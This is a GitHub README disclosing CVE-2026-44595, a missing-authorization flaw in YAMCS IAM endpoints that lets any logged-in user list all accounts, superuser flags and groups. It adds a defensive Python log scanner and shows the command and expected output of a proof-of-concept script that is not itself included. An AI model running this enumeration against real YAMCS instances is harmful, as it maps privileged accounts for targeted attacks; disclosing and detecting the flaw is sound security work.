GitHub: ex-cal1bur/CVE-2026-44595
# CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API
## Summary
The IAM API endpoints (`listUsers`, `getUser`, `listGroups`, `getGroup`) in `yamcs-core` do not enforce the required `SystemPrivilege.ControlAccess` check. Any authenticated user — even one with no privileges — can enumerate all user accounts, superuser status, and group memberships.
| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-44595 |
| **Severity** | MEDIUM (CVSS 4.3) |
| **CWE** | CWE-862: Missing Authorization |
| **Affected** | yamcs-core < 5.12.7 |
| **Fixed in** | yamcs-core 5.12.7 |
| **Advisory** | [GHSA-p2rj-mrmc-9w29](https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29) |
## Vulnerability Details
The following endpoints are missing the `SystemPrivilege.ControlAccess` authorization check:
- `GET /api/iam/users` — lists all users
- `GET /api/iam/users/{name}` — gets user details
- `GET /api/iam/groups` — lists all groups
- `GET /api/iam/groups/{name}` — gets group details
A low-privilege user can call these endpoints and retrieve all usernames, superuser flags, group memberships, and identity provider information.
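An added example, not part of this repository or of yamcs, that turns the endpoint list above into a log check: it flags successful IAM reads by accounts that are not expected to hold `ControlAccess`. The log line format, the `admin` allowlist and the sample log are constructed assumptions; the endpoint paths are the four from the advisory.

```python
import re
# Endpoint paths taken from the advisory; "{name}" matches one path component.
IAM_ENDPOINTS = [
    ("listUsers", re.compile(r"^/api/iam/users/?$")),
    ("getUser", re.compile(r"^/api/iam/users/[^/]+$")),
    ("listGroups", re.compile(r"^/api/iam/groups/?$")),
    ("getGroup", re.compile(r"^/api/iam/groups/[^/]+$")),
]
# Accounts expected to hold SystemPrivilege.ControlAccess (assumed, site-specific).
CONTROL_ACCESS_USERS = {"admin"}
# Constructed log format: "<timestamp> <user> <method> <path> <status>".
LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")

def classify(path):
    """Return the IAM endpoint name a request path maps to, or None."""
    path = path.split("?", 1)[0]  # ignore query string
    for name, pattern in IAM_ENDPOINTS:
        if pattern.match(path):
            return name
    return None

def scan(lines):
    """Return (user, endpoint, path) for each successful IAM read by an
    account outside the allowlist. On a vulnerable build a 200 here is the
    bug itself; on a patched build it means the allowlist is incomplete."""
    findings = []
    for line in lines:
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # blank or unparseable line
        _ts, user, method, path, status = match.groups()
        endpoint = classify(path)
        if method == "GET" and endpoint and status == "200" and user not in CONTROL_ACCESS_USERS:
            findings.append((user, endpoint, path))
    return findings

# Constructed sample: testuser is unprivileged; operator's 403 is what a patched build returns.
SAMPLE_LOG = """\
2026-05-20T10:00:01Z admin GET /api/iam/users 200
2026-05-20T10:00:05Z testuser GET /api/iam/users 200
2026-05-20T10:00:06Z testuser GET /api/iam/users/admin 200
2026-05-20T10:00:07Z testuser GET /api/iam/groups/operators?details=true 200
2026-05-20T10:00:09Z testuser GET /api/mdb/yamcs/parameters 200
2026-05-20T10:01:00Z operator GET /api/iam/groups 403
"""

if __name__ == "__main__":
    for user, endpoint, path in scan(SAMPLE_LOG.splitlines()):
        print(f"[!] {user} reached {endpoint} ({path}) without ControlAccess")
```

Feed it your real access log after adapting `LINE_RE` to its format; any hit from a non-allowlisted account on a build older than 5.12.7 is the advisory's bug, and any hit after upgrading points at an account that holds more privilege than intended.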
## Proof of Concept

```bash
pip install requests
python3 poc.py http://localhost:8090 testuser testpassword
```

Expected output on a vulnerable instance:

```text
[2] Listing ALL users (IAM endpoint)...
Status: HTTP 200
[!!!] VULNERABLE: 3 users enumerated
   -> admin [SUPERUSER]
   -> operator [regular]
   -> testuser [regular]
```
## Impact
An attacker with any valid account can map the entire user structure of the YAMCS instance — identifying superuser accounts for targeted attacks, enumerating operator accounts, and understanding group-based access controls.
## Fix
Upgrade to `yamcs-core >= 5.12.7`.
## Timeline
| Date | Event |
|------|-------|
| 2026-05 | Vulnerability reported |
| 2026-05-27 | Fix released in yamcs-core 5.12.7 |
| 2026-05-27 | Public advisory published |
## Researcher
**Daniel Miranda Barcelona (Excal1bur)**
- GitHub: [https://github.com/ex-cal1bur](https://github.com/ex-cal1bur)
- LinkedIn: [https://linkedin.com/in/daniel-miranda-barcelona](https://linkedin.com/in/daniel-miranda-barcelona)
- Blog: [https://thedumpster.es](https://thedumpster.es)